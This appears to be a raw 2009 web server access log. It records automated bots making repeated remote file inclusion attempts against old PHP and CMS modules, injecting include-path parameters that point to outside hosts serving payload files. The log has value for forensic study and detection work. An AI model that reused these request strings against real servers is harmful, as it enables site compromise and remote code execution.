202.44.52.78 - - [05/Feb/2009:05:47:34 -0600] "GET //?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:05:47:38 -0600] "GET /logs//?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 200 117465 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:05:47:39 -0600] "GET /logs/access_log.1221004800//?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
219.85.63.226 - - [05/Feb/2009:05:49:39 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:49:39 -0600] "GET /logs/access_log.1212278400//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:49:39 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.254.168.27 - - [05/Feb/2009:05:49:42 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.254.168.27 - - [05/Feb/2009:05:49:42 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.254.168.27 - - [05/Feb/2009:05:49:43 -0600] "GET /logs/access_log.1212278400//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:51:33 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:51:33 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:51:34 -0600] "GET /logs/access_log.1212278400%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:51:46 -0600] "GET /logs/access_log.1214438400%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:51:50 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:51:50 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:51:50 -0600] "GET /logs/access_log.1212278400%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:52:00 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:52:00 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:52:00 -0600] "GET /logs/access_log.1212278400//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:05:52:03 -0600] "GET /logs/access_log.1214438400%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.107 - - [05/Feb/2009:05:52:06 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:05:52:06 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:05:52:06 -0600] "GET /logs/access_log.1216339200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:05:52:15 -0600] "GET /logs/access_log.1216339200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:05:52:15 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:05:52:15 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
79.174.72.67 - - [05/Feb/2009:05:52:19 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
77.232.66.107 - - [05/Feb/2009:05:52:21 -0600] "GET /logs/access_log.1217203200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:05:52:26 -0600] "GET /logs/access_log.1217203200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
203.147.0.48 - - [05/Feb/2009:05:52:35 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:52:36 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
113.30.66.70 - - [05/Feb/2009:05:53:41 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
113.30.66.70 - - [05/Feb/2009:05:53:41 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
113.30.66.70 - - [05/Feb/2009:05:53:41 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
67.225.245.33 - - [05/Feb/2009:05:53:42 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:05:53:43 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:05:53:43 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.133.209.66 - - [05/Feb/2009:05:53:48 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:05:53:48 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:05:53:48 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
222.100.51.165 - - [05/Feb/2009:05:53:52 -0600] "GET /logs/access_log.1219017600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:53:53 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:54:02 -0600] "GET /logs/access_log.1219017600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:54:02 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:54:08 -0600] "GET /logs/access_log.1219017600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:54:08 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.121.24.179 - - [05/Feb/2009:05:54:09 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:05:54:09 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:05:54:10 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
85.204.231.202 - - [05/Feb/2009:05:54:22 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
219.85.63.226 - - [05/Feb/2009:05:54:36 -0600] "GET /logs/access_log.1212278400//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:54:36 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:54:36 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.63.18.78 - - [05/Feb/2009:05:55:05 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:05:55:05 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:05:55:05 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
222.100.51.165 - - [05/Feb/2009:05:56:25 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:57:12 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
222.100.51.165 - - [05/Feb/2009:05:57:16 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:05:57:17 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
222.100.51.165 - - [05/Feb/2009:05:57:17 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
219.85.63.226 - - [05/Feb/2009:05:57:28 -0600] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:57:28 -0600] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
219.85.63.226 - - [05/Feb/2009:05:57:28 -0600] "GET /logs/access_log.1214524800%20%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.189.224.21 - - [05/Feb/2009:05:57:38 -0600] "GET /logs/access_log.1216080000//bemarket/postscript/postscript.php?p_mode=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:05:57:58 -0600] "GET /logs/access_log.1219622400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:05:57:58 -0600] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:05:57:58 -0600] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:05:57:59 -0600] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:05:57:59 -0600] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:05:57:59 -0600] "GET /logs/access_log.1219622400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:05:58:28 -0600] "GET /logs/access_log.1217376000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
132.248.117.152 - - [05/Feb/2009:06:01:17 -0600] "GET /logs/access_log.1214179200/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:01:18 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:01:18 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
221.128.105.80 - - [05/Feb/2009:06:01:30 -0600] "GET /logs/access_log.1212278400//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:06:01:30 -0600] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:06:01:30 -0600] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.76.163.60 - - [05/Feb/2009:06:01:49 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:06:01:53 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
132.248.117.152 - - [05/Feb/2009:06:02:07 -0600] "GET /logs/access_log.1213920000/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:02:07 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:02:07 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:03:44 -0600] "GET /logs/access_log.1210377600/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:03:44 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:03:44 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
85.204.231.202 - - [05/Feb/2009:06:03:46 -0600] "GET /logs/access_log.1217376000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:06:03:47 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:06:03:47 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
79.174.72.67 - - [05/Feb/2009:06:03:47 -0600] "GET /logs/access_log.1217462400//modules/agendax/addevent.inc.php?agendax_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:06:03:47 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:06:03:48 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:06:03:57 -0600] "GET /logs/access_log.1219622400//modules/agendax/addevent.inc.php?agendax_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:04:23 -0600] "GET /logs/access_log.1210291200/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:05:00 -0600] "GET /logs/access_log.1216512000/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:05:00 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:05:01 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
66.40.52.30 - - [05/Feb/2009:06:05:09 -0600] "GET //common/db.php?commonpath=http://www.ispa-pecs-gis.hu/txt.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
66.40.52.30 - - [05/Feb/2009:06:05:09 -0600] "GET /logs//common/db.php?commonpath=http://www.ispa-pecs-gis.hu/txt.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.800"
132.248.117.152 - - [05/Feb/2009:06:05:35 -0600] "GET /logs/access_log.1218758400/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:05:36 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:05:36 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:06:06:37 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:06:06:37 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
222.100.51.165 - - [05/Feb/2009:06:07:57 -0600] "GET /logs/access_log.1213920000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 348 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
132.248.117.152 - - [05/Feb/2009:06:08:22 -0600] "GET /logs/access_log.1216512000/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:08:22 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:06:08:22 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:06:09:10 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:06:09:11 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.44.52.78 - - [05/Feb/2009:06:09:19 -0600] "GET /logs/access_log.1218499200//?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
221.128.105.80 - - [05/Feb/2009:06:09:55 -0600] "GET /logs/access_log.1214524800%20%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:06:09:55 -0600] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
221.128.105.80 - - [05/Feb/2009:06:09:55 -0600] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://harmonicamusiczone.com/components/chandralase/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.204.231.202 - - [05/Feb/2009:06:11:28 -0600] "GET /logs/access_log.1217462400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
132.248.117.152 - - [05/Feb/2009:06:13:58 -0600] "GET /logs/access_log.1209686400/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
65.98.28.210 - - [05/Feb/2009:06:14:55 -0600] "GET /logs/access_log.1216512000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:06:14:55 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
